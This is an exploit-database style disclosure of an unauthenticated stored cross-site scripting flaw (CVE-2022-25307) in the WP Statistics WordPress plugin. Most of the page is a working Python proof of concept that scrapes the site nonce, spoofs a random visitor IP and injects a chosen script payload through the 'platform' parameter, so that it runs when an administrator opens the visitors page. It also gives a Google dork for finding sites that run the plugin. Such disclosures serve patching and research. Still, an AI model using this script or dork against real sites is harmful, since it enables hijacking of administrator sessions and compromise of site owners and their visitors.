CVE-2022-25307: WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting in platform

WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting in platform

Exploit Title

WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting

Exploit Author

Muhammad Zeeshan (Xib3rR4dAr)

Date

February 13, 2022

Plugin Link

WP-Statistics

Plugin Active Installations

600,000+

Version

13.1.5 (Latest)

Tested on

Wordpress 5.9

Vulnerable Endpoint

/wp-json/wp-statistics/v2/hit

Vulnerable File

/wp-content/plugins/wp-statistics/includes/class-wp-statistics-hits.php and others

Vulnerable Parameters

platform

Google Dork

inurl:/wp-content/plugins/wp-statistics

CVE

N/A

Proof of Concept

unauthenticated_stored_xss_platform_poc.py

import requests, re, json, urllib.parse from random import randint

wpurl = input('\nWordPress URL: ') payload = input('\nPayload: ')

wp_session = requests.session()

wp = wp_session.get(wpurl) wp_nonce = re.search(r’_wpnonce=(.*?)&wp_statistics_hit’, wp.text).group(1)

headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}

payload = urllib.parse.quote_plus(payload) random_ip = ‘.’.join([str(randint(0,255)) for x in range(4)]) exploit = f’/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={wp_nonce}&wp_statistics_hit_rest=&browser=Chrome&platform={payload}&version=&referred=&ip={random_ip}&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0’ exploit_url = wpurl+exploit

print(f’\nSending XSS payload: {exploit_url}’)

wp = wp_session.get(exploit_url, headers=headers) data = wp.json()

print(“\nResponse: \n” + json.dumps(data, sort_keys=True, indent=4))

print(f’\nXSS will trigger when admin views platforms of vistors at {wpurl}/wp-admin/admin.php?page=wps_visitors_page or other pages’)